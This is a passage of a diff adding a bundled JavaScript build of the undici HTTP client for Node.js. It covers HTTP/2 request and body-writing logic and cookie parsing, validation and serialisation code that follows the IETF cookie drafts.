A user agent SHOULD NOT send a Content-Length header field when + // the request message does not contain a payload body and the method + // semantics do not anticipate such a body. 
+ + contentLength = null + } + + // https://github.com/nodejs/undici/issues/2046 + // A user agent may send a Content-Length header with 0 value, this should be allowed. + if (shouldSendContentLength(method) && contentLength > 0 && request.contentLength != null && request.contentLength !== contentLength) { + if (client[kStrictContentLength]) { + errorRequest(client, request, new RequestContentLengthMismatchError()) + return false + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + if (contentLength != null) { + assert(body, 'no body must not have content length') + headers[HTTP2_HEADER_CONTENT_LENGTH] = `${contentLength}` + } + + session.ref() + + const shouldEndStream = method === 'GET' || method === 'HEAD' + if (expectContinue) { + headers[HTTP2_HEADER_EXPECT] = '100-continue' + stream = session.request(headers, { endStream: shouldEndStream, signal }) + + stream.once('continue', writeBodyH2) + } else { + stream = session.request(headers, { + endStream: shouldEndStream, + signal + }) + writeBodyH2() + } + + // Increment counter as we have new several streams open + ++h2State.openStreams + + stream.once('response', headers => { + const { [HTTP2_HEADER_STATUS]: statusCode, ...realHeaders } = headers + + if (request.onHeaders(Number(statusCode), realHeaders, stream.resume.bind(stream), '') === false) { + stream.pause() + } + }) + + stream.once('end', () => { + request.onComplete([]) + }) + + stream.on('data', (chunk) => { + if (request.onData(chunk) === false) { + stream.pause() + } + }) + + stream.once('close', () => { + h2State.openStreams -= 1 + // TODO(HTTP/2): unref only if current streams count is 0 + if (h2State.openStreams === 0) { + session.unref() + } + }) + + stream.once('error', function (err) { + if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { + h2State.streams -= 1 + util.destroy(stream, err) + } + }) + + stream.once('frameError', (type, code) => { + const err = new 
InformationalError(`HTTP/2: "frameError" received - type ${type}, code ${code}`) + errorRequest(client, request, err) + + if (client[kHTTP2Session] && !client[kHTTP2Session].destroyed && !this.closed && !this.destroyed) { + h2State.streams -= 1 + util.destroy(stream, err) + } + }) + + // stream.on('aborted', () => { + // // TODO(HTTP/2): Support aborted + // }) + + // stream.on('timeout', () => { + // // TODO(HTTP/2): Support timeout + // }) + + // stream.on('push', headers => { + // // TODO(HTTP/2): Suppor push + // }) + + // stream.on('trailers', headers => { + // // TODO(HTTP/2): Support trailers + // }) + + return true + + function writeBodyH2 () { + /* istanbul ignore else: assertion */ + if (!body) { + request.onRequestSent() + } else if (util.isBuffer(body)) { + assert(contentLength === body.byteLength, 'buffer body must have content length') + stream.cork() + stream.write(body) + stream.uncork() + stream.end() + request.onBodySent(body) + request.onRequestSent() + } else if (util.isBlobLike(body)) { + if (typeof body.stream === 'function') { + writeIterable({ + client, + request, + contentLength, + h2stream: stream, + expectsPayload, + body: body.stream(), + socket: client[kSocket], + header: '' + }) + } else { + writeBlob({ + body, + client, + request, + contentLength, + expectsPayload, + h2stream: stream, + header: '', + socket: client[kSocket] + }) + } + } else if (util.isStream(body)) { + writeStream({ + body, + client, + request, + contentLength, + expectsPayload, + socket: client[kSocket], + h2stream: stream, + header: '' + }) + } else if (util.isIterable(body)) { + writeIterable({ + body, + client, + request, + contentLength, + expectsPayload, + header: '', + h2stream: stream, + socket: client[kSocket] + }) + } else { + assert(false) + } + } +} + +function writeStream ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength !== 0 || client[kRunning] === 0, 'stream body cannot be pipelined') + + if 
(client[kHTTPConnVersion] === 'h2') { + // For HTTP/2, is enough to pipe the stream + const pipe = pipeline( + body, + h2stream, + (err) => { + if (err) { + util.destroy(body, err) + util.destroy(h2stream, err) + } else { + request.onRequestSent() + } + } + ) + + pipe.on('data', onPipeData) + pipe.once('end', () => { + pipe.removeListener('data', onPipeData) + util.destroy(pipe) + }) + + function onPipeData (chunk) { + request.onBodySent(chunk) + } + + return + } + + let finished = false + + const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) + + const onData = function (chunk) { + if (finished) { + return + } + + try { + if (!writer.write(chunk) && this.pause) { + this.pause() + } + } catch (err) { + util.destroy(this, err) + } + } + const onDrain = function () { + if (finished) { + return + } + + if (body.resume) { + body.resume() + } + } + const onAbort = function () { + if (finished) { + return + } + const err = new RequestAbortedError() + queueMicrotask(() => onFinished(err)) + } + const onFinished = function (err) { + if (finished) { + return + } + + finished = true + + assert(socket.destroyed || (socket[kWriting] && client[kRunning] <= 1)) + + socket + .off('drain', onDrain) + .off('error', onFinished) + + body + .removeListener('data', onData) + .removeListener('end', onFinished) + .removeListener('error', onFinished) + .removeListener('close', onAbort) + + if (!err) { + try { + writer.end() + } catch (er) { + err = er + } + } + + writer.destroy(err) + + if (err && (err.code !== 'UND_ERR_INFO' || err.message !== 'reset')) { + util.destroy(body, err) + } else { + util.destroy(body) + } + } + + body + .on('data', onData) + .on('end', onFinished) + .on('error', onFinished) + .on('close', onAbort) + + if (body.resume) { + body.resume() + } + + socket + .on('drain', onDrain) + .on('error', onFinished) +} + +async function writeBlob ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) 
{ + assert(contentLength === body.size, 'blob body must have content length') + + const isH2 = client[kHTTPConnVersion] === 'h2' + try { + if (contentLength != null && contentLength !== body.size) { + throw new RequestContentLengthMismatchError() + } + + const buffer = Buffer.from(await body.arrayBuffer()) + + if (isH2) { + h2stream.cork() + h2stream.write(buffer) + h2stream.uncork() + } else { + socket.cork() + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + socket.write(buffer) + socket.uncork() + } + + request.onBodySent(buffer) + request.onRequestSent() + + if (!expectsPayload) { + socket[kReset] = true + } + + resume(client) + } catch (err) { + util.destroy(isH2 ? h2stream : socket, err) + } +} + +async function writeIterable ({ h2stream, body, client, request, socket, contentLength, header, expectsPayload }) { + assert(contentLength !== 0 || client[kRunning] === 0, 'iterator body cannot be pipelined') + + let callback = null + function onDrain () { + if (callback) { + const cb = callback + callback = null + cb() + } + } + + const waitForDrain = () => new Promise((resolve, reject) => { + assert(callback === null) + + if (socket[kError]) { + reject(socket[kError]) + } else { + callback = resolve + } + }) + + if (client[kHTTPConnVersion] === 'h2') { + h2stream + .on('close', onDrain) + .on('drain', onDrain) + + try { + // It's up to the user to somehow abort the async iterable. 
+ for await (const chunk of body) { + if (socket[kError]) { + throw socket[kError] + } + + const res = h2stream.write(chunk) + request.onBodySent(chunk) + if (!res) { + await waitForDrain() + } + } + } catch (err) { + h2stream.destroy(err) + } finally { + request.onRequestSent() + h2stream.end() + h2stream + .off('close', onDrain) + .off('drain', onDrain) + } + + return + } + + socket + .on('close', onDrain) + .on('drain', onDrain) + + const writer = new AsyncWriter({ socket, request, contentLength, client, expectsPayload, header }) + try { + // It's up to the user to somehow abort the async iterable. + for await (const chunk of body) { + if (socket[kError]) { + throw socket[kError] + } + + if (!writer.write(chunk)) { + await waitForDrain() + } + } + + writer.end() + } catch (err) { + writer.destroy(err) + } finally { + socket + .off('close', onDrain) + .off('drain', onDrain) + } +} + +class AsyncWriter { + constructor ({ socket, request, contentLength, client, expectsPayload, header }) { + this.socket = socket + this.request = request + this.contentLength = contentLength + this.client = client + this.bytesWritten = 0 + this.expectsPayload = expectsPayload + this.header = header + + socket[kWriting] = true + } + + write (chunk) { + const { socket, request, contentLength, client, bytesWritten, expectsPayload, header } = this + + if (socket[kError]) { + throw socket[kError] + } + + if (socket.destroyed) { + return false + } + + const len = Buffer.byteLength(chunk) + if (!len) { + return true + } + + // We should defer writing chunks. 
+ if (contentLength !== null && bytesWritten + len > contentLength) { + if (client[kStrictContentLength]) { + throw new RequestContentLengthMismatchError() + } + + process.emitWarning(new RequestContentLengthMismatchError()) + } + + socket.cork() + + if (bytesWritten === 0) { + if (!expectsPayload) { + socket[kReset] = true + } + + if (contentLength === null) { + socket.write(`${header}transfer-encoding: chunked\r\n`, 'latin1') + } else { + socket.write(`${header}content-length: ${contentLength}\r\n\r\n`, 'latin1') + } + } + + if (contentLength === null) { + socket.write(`\r\n${len.toString(16)}\r\n`, 'latin1') + } + + this.bytesWritten += len + + const ret = socket.write(chunk) + + socket.uncork() + + request.onBodySent(chunk) + + if (!ret) { + if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { + // istanbul ignore else: only for jest + if (socket[kParser].timeout.refresh) { + socket[kParser].timeout.refresh() + } + } + } + + return ret + } + + end () { + const { socket, contentLength, client, bytesWritten, expectsPayload, header, request } = this + request.onRequestSent() + + socket[kWriting] = false + + if (socket[kError]) { + throw socket[kError] + } + + if (socket.destroyed) { + return + } + + if (bytesWritten === 0) { + if (expectsPayload) { + // https://tools.ietf.org/html/rfc7230#section-3.3.2 + // A user agent SHOULD send a Content-Length in a request message when + // no Transfer-Encoding is sent and the request method defines a meaning + // for an enclosed payload body. 
+ + socket.write(`${header}content-length: 0\r\n\r\n`, 'latin1') + } else { + socket.write(`${header}\r\n`, 'latin1') + } + } else if (contentLength === null) { + socket.write('\r\n0\r\n\r\n', 'latin1') + } + + if (contentLength !== null && bytesWritten !== contentLength) { + if (client[kStrictContentLength]) { + throw new RequestContentLengthMismatchError() + } else { + process.emitWarning(new RequestContentLengthMismatchError()) + } + } + + if (socket[kParser].timeout && socket[kParser].timeoutType === TIMEOUT_HEADERS) { + // istanbul ignore else: only for jest + if (socket[kParser].timeout.refresh) { + socket[kParser].timeout.refresh() + } + } + + resume(client) + } + + destroy (err) { + const { socket, client } = this + + socket[kWriting] = false + + if (err) { + assert(client[kRunning] <= 1, 'pipeline should only contain this request') + util.destroy(socket, err) + } + } +} + +function errorRequest (client, request, err) { + try { + request.onError(err) + assert(request.aborted) + } catch (err) { + client.emit('error', err) + } +} + +module.exports = Client + + +/***/ }), + +/***/ 6436: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +/* istanbul ignore file: only for Node 12 */ + +const { kConnected, kSize } = __nccwpck_require__(2785) + +class CompatWeakRef { + constructor (value) { + this.value = value + } + + deref () { + return this.value[kConnected] === 0 && this.value[kSize] === 0 + ? 
undefined + : this.value + } +} + +class CompatFinalizer { + constructor (finalizer) { + this.finalizer = finalizer + } + + register (dispatcher, key) { + if (dispatcher.on) { + dispatcher.on('disconnect', () => { + if (dispatcher[kConnected] === 0 && dispatcher[kSize] === 0) { + this.finalizer(key) + } + }) + } + } +} + +module.exports = function () { + // FIXME: remove workaround when the Node bug is fixed + // https://github.com/nodejs/node/issues/49344#issuecomment-1741776308 + if (process.env.NODE_V8_COVERAGE) { + return { + WeakRef: CompatWeakRef, + FinalizationRegistry: CompatFinalizer + } + } + return { + WeakRef: global.WeakRef || CompatWeakRef, + FinalizationRegistry: global.FinalizationRegistry || CompatFinalizer + } +} + + +/***/ }), + +/***/ 663: +/***/ ((module) => { + +"use strict"; + + +// https://wicg.github.io/cookie-store/#cookie-maximum-attribute-value-size +const maxAttributeValueSize = 1024 + +// https://wicg.github.io/cookie-store/#cookie-maximum-name-value-pair-size +const maxNameValuePairSize = 4096 + +module.exports = { + maxAttributeValueSize, + maxNameValuePairSize +} + + +/***/ }), + +/***/ 1724: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { parseSetCookie } = __nccwpck_require__(4408) +const { stringify, getHeadersList } = __nccwpck_require__(3121) +const { webidl } = __nccwpck_require__(1744) +const { Headers } = __nccwpck_require__(554) + +/** + * @typedef {Object} Cookie + * @property {string} name + * @property {string} value + * @property {Date|number|undefined} expires + * @property {number|undefined} maxAge + * @property {string|undefined} domain + * @property {string|undefined} path + * @property {boolean|undefined} secure + * @property {boolean|undefined} httpOnly + * @property {'Strict'|'Lax'|'None'} sameSite + * @property {string[]} unparsed + */ + +/** + * @param {Headers} headers + * @returns {Record} + */ +function getCookies (headers) { + 
webidl.argumentLengthCheck(arguments, 1, { header: 'getCookies' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + const cookie = headers.get('cookie') + const out = {} + + if (!cookie) { + return out + } + + for (const piece of cookie.split(';')) { + const [name, ...value] = piece.split('=') + + out[name.trim()] = value.join('=') + } + + return out +} + +/** + * @param {Headers} headers + * @param {string} name + * @param {{ path?: string, domain?: string }|undefined} attributes + * @returns {void} + */ +function deleteCookie (headers, name, attributes) { + webidl.argumentLengthCheck(arguments, 2, { header: 'deleteCookie' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + name = webidl.converters.DOMString(name) + attributes = webidl.converters.DeleteCookieAttributes(attributes) + + // Matches behavior of + // https://github.com/denoland/deno_std/blob/63827b16330b82489a04614027c33b7904e08be5/http/cookie.ts#L278 + setCookie(headers, { + name, + value: '', + expires: new Date(0), + ...attributes + }) +} + +/** + * @param {Headers} headers + * @returns {Cookie[]} + */ +function getSetCookies (headers) { + webidl.argumentLengthCheck(arguments, 1, { header: 'getSetCookies' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + const cookies = getHeadersList(headers).cookies + + if (!cookies) { + return [] + } + + // In older versions of undici, cookies is a list of name:value. + return cookies.map((pair) => parseSetCookie(Array.isArray(pair) ? 
pair[1] : pair)) +} + +/** + * @param {Headers} headers + * @param {Cookie} cookie + * @returns {void} + */ +function setCookie (headers, cookie) { + webidl.argumentLengthCheck(arguments, 2, { header: 'setCookie' }) + + webidl.brandCheck(headers, Headers, { strict: false }) + + cookie = webidl.converters.Cookie(cookie) + + const str = stringify(cookie) + + if (str) { + headers.append('Set-Cookie', stringify(cookie)) + } +} + +webidl.converters.DeleteCookieAttributes = webidl.dictionaryConverter([ + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'path', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'domain', + defaultValue: null + } +]) + +webidl.converters.Cookie = webidl.dictionaryConverter([ + { + converter: webidl.converters.DOMString, + key: 'name' + }, + { + converter: webidl.converters.DOMString, + key: 'value' + }, + { + converter: webidl.nullableConverter((value) => { + if (typeof value === 'number') { + return webidl.converters['unsigned long long'](value) + } + + return new Date(value) + }), + key: 'expires', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters['long long']), + key: 'maxAge', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'domain', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.DOMString), + key: 'path', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.boolean), + key: 'secure', + defaultValue: null + }, + { + converter: webidl.nullableConverter(webidl.converters.boolean), + key: 'httpOnly', + defaultValue: null + }, + { + converter: webidl.converters.USVString, + key: 'sameSite', + allowedValues: ['Strict', 'Lax', 'None'] + }, + { + converter: webidl.sequenceConverter(webidl.converters.DOMString), + key: 'unparsed', + defaultValue: [] + } +]) + +module.exports = { + getCookies, + 
deleteCookie, + getSetCookies, + setCookie +} + + +/***/ }), + +/***/ 4408: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { maxNameValuePairSize, maxAttributeValueSize } = __nccwpck_require__(663) +const { isCTLExcludingHtab } = __nccwpck_require__(3121) +const { collectASequenceOfCodePointsFast } = __nccwpck_require__(685) +const assert = __nccwpck_require__(9491) + +/** + * @description Parses the field-value attributes of a set-cookie header string. + * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 + * @param {string} header + * @returns if the header is invalid, null will be returned + */ +function parseSetCookie (header) { + // 1. If the set-cookie-string contains a %x00-08 / %x0A-1F / %x7F + // character (CTL characters excluding HTAB): Abort these steps and + // ignore the set-cookie-string entirely. + if (isCTLExcludingHtab(header)) { + return null + } + + let nameValuePair = '' + let unparsedAttributes = '' + let name = '' + let value = '' + + // 2. If the set-cookie-string contains a %x3B (";") character: + if (header.includes(';')) { + // 1. The name-value-pair string consists of the characters up to, + // but not including, the first %x3B (";"), and the unparsed- + // attributes consist of the remainder of the set-cookie-string + // (including the %x3B (";") in question). + const position = { position: 0 } + + nameValuePair = collectASequenceOfCodePointsFast(';', header, position) + unparsedAttributes = header.slice(position.position) + } else { + // Otherwise: + + // 1. The name-value-pair string consists of all the characters + // contained in the set-cookie-string, and the unparsed- + // attributes is the empty string. + nameValuePair = header + } + + // 3. If the name-value-pair string lacks a %x3D ("=") character, then + // the name string is empty, and the value string is the value of + // name-value-pair. 
+ if (!nameValuePair.includes('=')) { + value = nameValuePair + } else { + // Otherwise, the name string consists of the characters up to, but + // not including, the first %x3D ("=") character, and the (possibly + // empty) value string consists of the characters after the first + // %x3D ("=") character. + const position = { position: 0 } + name = collectASequenceOfCodePointsFast( + '=', + nameValuePair, + position + ) + value = nameValuePair.slice(position.position + 1) + } + + // 4. Remove any leading or trailing WSP characters from the name + // string and the value string. + name = name.trim() + value = value.trim() + + // 5. If the sum of the lengths of the name string and the value string + // is more than 4096 octets, abort these steps and ignore the set- + // cookie-string entirely. + if (name.length + value.length > maxNameValuePairSize) { + return null + } + + // 6. The cookie-name is the name string, and the cookie-value is the + // value string. + return { + name, value, ...parseUnparsedAttributes(unparsedAttributes) + } +} + +/** + * Parses the remaining attributes of a set-cookie header + * @see https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4 + * @param {string} unparsedAttributes + * @param {[Object.]={}} cookieAttributeList + */ +function parseUnparsedAttributes (unparsedAttributes, cookieAttributeList = {}) { + // 1. If the unparsed-attributes string is empty, skip the rest of + // these steps. + if (unparsedAttributes.length === 0) { + return cookieAttributeList + } + + // 2. Discard the first character of the unparsed-attributes (which + // will be a %x3B (";") character). + assert(unparsedAttributes[0] === ';') + unparsedAttributes = unparsedAttributes.slice(1) + + let cookieAv = '' + + // 3. If the remaining unparsed-attributes contains a %x3B (";") + // character: + if (unparsedAttributes.includes(';')) { + // 1. 
Consume the characters of the unparsed-attributes up to, but + // not including, the first %x3B (";") character. + cookieAv = collectASequenceOfCodePointsFast( + ';', + unparsedAttributes, + { position: 0 } + ) + unparsedAttributes = unparsedAttributes.slice(cookieAv.length) + } else { + // Otherwise: + + // 1. Consume the remainder of the unparsed-attributes. + cookieAv = unparsedAttributes + unparsedAttributes = '' + } + + // Let the cookie-av string be the characters consumed in this step. + + let attributeName = '' + let attributeValue = '' + + // 4. If the cookie-av string contains a %x3D ("=") character: + if (cookieAv.includes('=')) { + // 1. The (possibly empty) attribute-name string consists of the + // characters up to, but not including, the first %x3D ("=") + // character, and the (possibly empty) attribute-value string + // consists of the characters after the first %x3D ("=") + // character. + const position = { position: 0 } + + attributeName = collectASequenceOfCodePointsFast( + '=', + cookieAv, + position + ) + attributeValue = cookieAv.slice(position.position + 1) + } else { + // Otherwise: + + // 1. The attribute-name string consists of the entire cookie-av + // string, and the attribute-value string is empty. + attributeName = cookieAv + } + + // 5. Remove any leading or trailing WSP characters from the attribute- + // name string and the attribute-value string. + attributeName = attributeName.trim() + attributeValue = attributeValue.trim() + + // 6. If the attribute-value is longer than 1024 octets, ignore the + // cookie-av string and return to Step 1 of this algorithm. + if (attributeValue.length > maxAttributeValueSize) { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 7. Process the attribute-name and attribute-value according to the + // requirements in the following subsections. (Notice that + // attributes with unrecognized attribute-names are ignored.) 
+ const attributeNameLowercase = attributeName.toLowerCase() + + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.1 + // If the attribute-name case-insensitively matches the string + // "Expires", the user agent MUST process the cookie-av as follows. + if (attributeNameLowercase === 'expires') { + // 1. Let the expiry-time be the result of parsing the attribute-value + // as cookie-date (see Section 5.1.1). + const expiryTime = new Date(attributeValue) + + // 2. If the attribute-value failed to parse as a cookie date, ignore + // the cookie-av. + + cookieAttributeList.expires = expiryTime + } else if (attributeNameLowercase === 'max-age') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.2 + // If the attribute-name case-insensitively matches the string "Max- + // Age", the user agent MUST process the cookie-av as follows. + + // 1. If the first character of the attribute-value is not a DIGIT or a + // "-" character, ignore the cookie-av. + const charCode = attributeValue.charCodeAt(0) + + if ((charCode < 48 || charCode > 57) && attributeValue[0] !== '-') { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 2. If the remainder of attribute-value contains a non-DIGIT + // character, ignore the cookie-av. + if (!/^\d+$/.test(attributeValue)) { + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) + } + + // 3. Let delta-seconds be the attribute-value converted to an integer. + const deltaSeconds = Number(attributeValue) + + // 4. Let cookie-age-limit be the maximum age of the cookie (which + // SHOULD be 400 days or less, see Section 4.1.2.2). + + // 5. Set delta-seconds to the smaller of its present value and cookie- + // age-limit. + // deltaSeconds = Math.min(deltaSeconds * 1000, maxExpiresMs) + + // 6. If delta-seconds is less than or equal to zero (0), let expiry- + // time be the earliest representable date and time. 
Otherwise, let + // the expiry-time be the current date and time plus delta-seconds + // seconds. + // const expiryTime = deltaSeconds <= 0 ? Date.now() : Date.now() + deltaSeconds + + // 7. Append an attribute to the cookie-attribute-list with an + // attribute-name of Max-Age and an attribute-value of expiry-time. + cookieAttributeList.maxAge = deltaSeconds + } else if (attributeNameLowercase === 'domain') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.3 + // If the attribute-name case-insensitively matches the string "Domain", + // the user agent MUST process the cookie-av as follows. + + // 1. Let cookie-domain be the attribute-value. + let cookieDomain = attributeValue + + // 2. If cookie-domain starts with %x2E ("."), let cookie-domain be + // cookie-domain without its leading %x2E ("."). + if (cookieDomain[0] === '.') { + cookieDomain = cookieDomain.slice(1) + } + + // 3. Convert the cookie-domain to lower case. + cookieDomain = cookieDomain.toLowerCase() + + // 4. Append an attribute to the cookie-attribute-list with an + // attribute-name of Domain and an attribute-value of cookie-domain. + cookieAttributeList.domain = cookieDomain + } else if (attributeNameLowercase === 'path') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.4 + // If the attribute-name case-insensitively matches the string "Path", + // the user agent MUST process the cookie-av as follows. + + // 1. If the attribute-value is empty or if the first character of the + // attribute-value is not %x2F ("/"): + let cookiePath = '' + if (attributeValue.length === 0 || attributeValue[0] !== '/') { + // 1. Let cookie-path be the default-path. + cookiePath = '/' + } else { + // Otherwise: + + // 1. Let cookie-path be the attribute-value. + cookiePath = attributeValue + } + + // 2. Append an attribute to the cookie-attribute-list with an + // attribute-name of Path and an attribute-value of cookie-path. 
+ cookieAttributeList.path = cookiePath + } else if (attributeNameLowercase === 'secure') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.5 + // If the attribute-name case-insensitively matches the string "Secure", + // the user agent MUST append an attribute to the cookie-attribute-list + // with an attribute-name of Secure and an empty attribute-value. + + cookieAttributeList.secure = true + } else if (attributeNameLowercase === 'httponly') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.6 + // If the attribute-name case-insensitively matches the string + // "HttpOnly", the user agent MUST append an attribute to the cookie- + // attribute-list with an attribute-name of HttpOnly and an empty + // attribute-value. + + cookieAttributeList.httpOnly = true + } else if (attributeNameLowercase === 'samesite') { + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-rfc6265bis#section-5.4.7 + // If the attribute-name case-insensitively matches the string + // "SameSite", the user agent MUST process the cookie-av as follows: + + // 1. Let enforcement be "Default". + let enforcement = 'Default' + + const attributeValueLowercase = attributeValue.toLowerCase() + // 2. If cookie-av's attribute-value is a case-insensitive match for + // "None", set enforcement to "None". + if (attributeValueLowercase.includes('none')) { + enforcement = 'None' + } + + // 3. If cookie-av's attribute-value is a case-insensitive match for + // "Strict", set enforcement to "Strict". + if (attributeValueLowercase.includes('strict')) { + enforcement = 'Strict' + } + + // 4. If cookie-av's attribute-value is a case-insensitive match for + // "Lax", set enforcement to "Lax". + if (attributeValueLowercase.includes('lax')) { + enforcement = 'Lax' + } + + // 5. Append an attribute to the cookie-attribute-list with an + // attribute-name of "SameSite" and an attribute-value of + // enforcement. 
+ cookieAttributeList.sameSite = enforcement + } else { + cookieAttributeList.unparsed ??= [] + + cookieAttributeList.unparsed.push(`${attributeName}=${attributeValue}`) + } + + // 8. Return to Step 1 of this algorithm. + return parseUnparsedAttributes(unparsedAttributes, cookieAttributeList) +} + +module.exports = { + parseSetCookie, + parseUnparsedAttributes +} + + +/***/ }), + +/***/ 3121: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const assert = __nccwpck_require__(9491) +const { kHeadersList } = __nccwpck_require__(2785) + +function isCTLExcludingHtab (value) { + if (value.length === 0) { + return false + } + + for (const char of value) { + const code = char.charCodeAt(0) + + if ( + (code >= 0x00 || code <= 0x08) || + (code >= 0x0A || code <= 0x1F) || + code === 0x7F + ) { + return false + } + } +} + +/** + CHAR = + token = 1* + separators = "(" | ")" | "<" | ">" | "@" + | "," | ";" | ":" | "\" | <"> + | "/" | "[" | "]" | "?" | "=" + | "{" | "}" | SP | HT + * @param {string} name + */ +function validateCookieName (name) { + for (const char of name) { + const code = char.charCodeAt(0) + + if ( + (code <= 0x20 || code > 0x7F) || + char === '(' || + char === ')' || + char === '>' || + char === '<' || + char === '@' || + char === ',' || + char === ';' || + char === ':' || + char === '\\' || + char === '"' || + char === '/' || + char === '[' || + char === ']' || + char === '?' 
|| + char === '=' || + char === '{' || + char === '}' + ) { + throw new Error('Invalid cookie name') + } + } +} + +/** + cookie-value = *cookie-octet / ( DQUOTE *cookie-octet DQUOTE ) + cookie-octet = %x21 / %x23-2B / %x2D-3A / %x3C-5B / %x5D-7E + ; US-ASCII characters excluding CTLs, + ; whitespace DQUOTE, comma, semicolon, + ; and backslash + * @param {string} value + */ +function validateCookieValue (value) { + for (const char of value) { + const code = char.charCodeAt(0) + + if ( + code < 0x21 || // exclude CTLs (0-31) + code === 0x22 || + code === 0x2C || + code === 0x3B || + code === 0x5C || + code > 0x7E // non-ascii + ) { + throw new Error('Invalid header value') + } + } +} + +/** + * path-value = + * @param {string} path + */ +function validateCookiePath (path) { + for (const char of path) { + const code = char.charCodeAt(0) + + if (code < 0x21 || char === ';') { + throw new Error('Invalid cookie path') + } + } +} + +/** + * I have no idea why these values aren't allowed to be honest, + * but Deno tests these. 
- Khafra + * @param {string} domain + */ +function validateCookieDomain (domain) { + if ( + domain.startsWith('-') || + domain.endsWith('.') || + domain.endsWith('-') + ) { + throw new Error('Invalid cookie domain') + } +} + +/** + * @see https://www.rfc-editor.org/rfc/rfc7231#section-7.1.1.1 + * @param {number|Date} date + IMF-fixdate = day-name "," SP date1 SP time-of-day SP GMT + ; fixed length/zone/capitalization subset of the format + ; see Section 3.3 of [RFC5322] + + day-name = %x4D.6F.6E ; "Mon", case-sensitive + / %x54.75.65 ; "Tue", case-sensitive + / %x57.65.64 ; "Wed", case-sensitive + / %x54.68.75 ; "Thu", case-sensitive + / %x46.72.69 ; "Fri", case-sensitive + / %x53.61.74 ; "Sat", case-sensitive + / %x53.75.6E ; "Sun", case-sensitive + date1 = day SP month SP year + ; e.g., 02 Jun 1982 + + day = 2DIGIT + month = %x4A.61.6E ; "Jan", case-sensitive + / %x46.65.62 ; "Feb", case-sensitive + / %x4D.61.72 ; "Mar", case-sensitive + / %x41.70.72 ; "Apr", case-sensitive + / %x4D.61.79 ; "May", case-sensitive + / %x4A.75.6E ; "Jun", case-sensitive + / %x4A.75.6C ; "Jul", case-sensitive + / %x41.75.67 ; "Aug", case-sensitive + / %x53.65.70 ; "Sep", case-sensitive + / %x4F.63.74 ; "Oct", case-sensitive + / %x4E.6F.76 ; "Nov", case-sensitive + / %x44.65.63 ; "Dec", case-sensitive + year = 4DIGIT + + GMT = %x47.4D.54 ; "GMT", case-sensitive + + time-of-day = hour ":" minute ":" second + ; 00:00:00 - 23:59:60 (leap second) + + hour = 2DIGIT + minute = 2DIGIT + second = 2DIGIT + */ +function toIMFDate (date) { + if (typeof date === 'number') { + date = new Date(date) + } + + const days = [ + 'Sun', 'Mon', 'Tue', 'Wed', + 'Thu', 'Fri', 'Sat' + ] + + const months = [ + 'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', + 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec' + ] + + const dayName = days[date.getUTCDay()] + const day = date.getUTCDate().toString().padStart(2, '0') + const month = months[date.getUTCMonth()] + const year = date.getUTCFullYear() + const hour = 
date.getUTCHours().toString().padStart(2, '0') + const minute = date.getUTCMinutes().toString().padStart(2, '0') + const second = date.getUTCSeconds().toString().padStart(2, '0') + + return `${dayName}, ${day} ${month} ${year} ${hour}:${minute}:${second} GMT` +} + +/** + max-age-av = "Max-Age=" non-zero-digit *DIGIT + ; In practice, both expires-av and max-age-av + ; are limited to dates representable by the + ; user agent. + * @param {number} maxAge + */ +function validateCookieMaxAge (maxAge) { + if (maxAge < 0) { + throw new Error('Invalid cookie max-age') + } +} + +/** + * @see https://www.rfc-editor.org/rfc/rfc6265#section-4.1.1 + * @param {import('./index').Cookie} cookie + */ +function stringify (cookie) { + if (cookie.name.length === 0) { + return null + } + + validateCookieName(cookie.name) + validateCookieValue(cookie.value) + + const out = [`${cookie.name}=${cookie.value}`] + + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.1 + // https://datatracker.ietf.org/doc/html/draft-ietf-httpbis-cookie-prefixes-00#section-3.2 + if (cookie.name.startsWith('__Secure-')) { + cookie.secure = true + } + + if (cookie.name.startsWith('__Host-')) { + cookie.secure = true + cookie.domain = null + cookie.path = '/' + } + + if (cookie.secure) { + out.push('Secure') + } + + if (cookie.httpOnly) { + out.push('HttpOnly') + } + + if (typeof cookie.maxAge === 'number') { + validateCookieMaxAge(cookie.maxAge) + 